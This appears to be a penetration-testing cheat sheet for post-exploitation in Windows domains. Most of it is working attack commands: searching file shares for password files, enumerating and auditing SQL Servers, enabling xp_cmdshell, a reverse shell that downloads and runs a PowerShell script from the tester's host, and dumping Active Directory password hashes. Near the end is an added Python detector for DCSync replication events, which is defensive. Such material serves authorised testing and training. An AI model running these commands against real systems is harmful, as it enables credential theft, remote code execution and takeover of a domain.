8 - Post-Exploitation.md

File metadata and controls

141 lines (85 loc) · 2.94 KB

File Shares (from Linux)

Powerview Find-InterestingFile

Plunder http://joshstone.us/plunder/

CrackMapExec

Mount Windows Shares:

apt-get install -y cifs-utils
mount -t cifs -o ro,domain=[domain],username=[username],password=[password],sec=ntlmv2 //hostnameOrIP/Share /path/to/localdir

-OR-

mount.cifs //172.16.42.52/C /root/share -o username=<user>

Search file contents:

grep -irn --include \*.txt --include \*.doc --include \*.xls --include \*.xlsx passw

Search file names:

find . -iname "*passw*" | grep -e '\.txt$' -e '\.xlsx$' -e '\.xls$' -e '\.doc$'

File Shares (from Windows)

Launch a cmd prompt as another user:

runas /netonly /user:[Domain]\[username] cmd.exe

Start PowerShell:

powershell -nop -exec bypass
Import-Module [full path to PowerView.ps1]

Verify you have authenticated access:

Get-NetDomainControllers

Run Invoke-ShareFinder:

Invoke-ShareFinder -Verbose -HostList [./hostlist.txt] -ExcludeStandard -CheckShareAccess | Out-File -Encoding ASCII Found-Shares.txt

Find Interesting Files:

Invoke-FileFinder [Optional: -ShareList shares.txt] -Terms [comma separated terms] -OutFile interesting_files.csv

Databases

In addition to RDP'ing into a host to run MS database tools, you can use DBVisualizer (free) over sshuttle, Metasploit, and SQShell.

PowerUpSQL

Launch a cmd prompt as another user:

runas /netonly /user:[Domain]\[username] cmd.exe

Start PowerShell:

powershell -nop -exec bypass
Import-Module [full path to PowerUpSQL.psd1]

Verify you have authenticated access:

Get-NetDomainControllers

MSSQL Server Discovery:

Get-SQLInstanceDomain -Verbose

Easy Server Auditing:

Invoke-SQLDumpInfo -Verbose -Instance "SQLServer1\STANDARDDEV2014"

... review output csv files.

Invoke-SQLAudit -Verbose -Instance "SQLServer1\STANDARDDEV2014"

Automation:

$Servers = Get-SQLInstanceDomain -Verbose | Get-SQLConnectionTestThreaded -Verbose -Threads 10 | Where-Object {$_.Status -eq "Accessible"}
$Servers | Get-SQLServerInfo -Verbose
$Servers | Invoke-SQLAudit -Verbose

Metasploit: auxiliary/admin/mssql/mssql_findandsampledata

sqsh connect:

sqsh -S [Server IP] -U sa -P [password]

Execute commands:

xp_cmdshell 'whoami'
go

Enable xp_cmdshell:

EXEC SP_CONFIGURE 'xp_cmdshell', 1
reconfigure
go

Rotten Potato

xp_cmdshell "whoami /priv"

Look for "SeImpersonatePrivilege"

Get a reverse shell (Use Nishang Invoke-PowerShellTcp.ps1):

xp_cmdshell "powershell IEX(New-Object Net.webclient).downloadString('http://[PTK IP]/[port]/[scriptname.ps1]')"
go

Dump Active Directory database (ntds) hashes

/opt/impacket/examples/secretsdump.py [Domain]/[username]@[DC FQDN] | tee /path/to/outputfile

-OR-

crackmapexec smb [IP] -u [username] -p [password] --ntds drsuapi

Output log of cme will be in /root/.cme/logs
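Both ntds dumping methods above pull hashes by requesting directory replication from a DC, which a domain controller logs as Security event 4662 with one of the replication control-access GUIDs. The detection below is an added example for these notes (not from the original cheat sheet or any tool it names); the event records and the allowed account names are constructed, the GUIDs are the real Active Directory replication rights.

```python
import re

# Control-access rights that allow directory replication (real AD GUIDs):
# DS-Replication-Get-Changes, -Get-Changes-All, -Get-Changes-In-Filtered-Set.
REPLICATION_GUIDS = {
    "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2",
    "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2",
    "89e95b76-444d-4c62-991a-0facbeda640c",
}

# Accounts expected to replicate: DC computer accounts (constructed names).
ALLOWED_ACCOUNTS = {"DC01$", "DC02$"}

# Constructed sample 4662 records in the key/value layout of the event body.
# Record 1: normal DC-to-DC replication.  Record 2: a user account asking for
# DS-Replication-Get-Changes-All.  Record 3: unrelated read of an attribute.
SAMPLE_EVENTS = [
    "Event ID: 4662\nAccount Name: DC02$\nAccess Mask: 0x100\n"
    "Properties: Control Access\n {1131f6aa-9c07-11d1-f79f-00c04fc2dcd2}\n"
    " {19195a5b-6da0-11d0-afd3-00c04fd930c9}",
    "Event ID: 4662\nAccount Name: jsmith\nAccess Mask: 0x100\n"
    "Properties: Control Access\n {1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}\n"
    " {19195a5b-6da0-11d0-afd3-00c04fd930c9}",
    "Event ID: 4662\nAccount Name: jsmith\nAccess Mask: 0x10\n"
    "Properties: Read Property\n {bf967a86-0de6-11d0-a285-00aa003049e2}",
]


def parse_4662(record):
    """Extract the fields needed for the check plus every GUID in Properties."""
    fields = dict(re.findall(r"^(Event ID|Account Name|Access Mask):\s*(.+)$",
                             record, re.M))
    fields["guids"] = {g.lower() for g in re.findall(r"\{([0-9a-f-]{36})\}",
                                                     record, re.I)}
    return fields


def is_dcsync(fields):
    """Control Access (0x100) on a replication right by a non-DC account."""
    return (fields.get("Event ID") == "4662"
            and fields.get("Access Mask") == "0x100"
            and bool(fields["guids"] & REPLICATION_GUIDS)
            and fields.get("Account Name") not in ALLOWED_ACCOUNTS)


def find_dcsync(records):
    """Return the account names behind suspicious replication requests."""
    return [f["Account Name"] for f in map(parse_4662, records) if is_dcsync(f)]


if __name__ == "__main__":
    print(find_dcsync(SAMPLE_EVENTS))  # ['jsmith']
```

Auditing for 4662 on the domain object must be enabled on the DCs for these events to exist; without it the replication request leaves no trace in the Security log.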

SharePoint

CrackMapExec invoke_sessiongopher module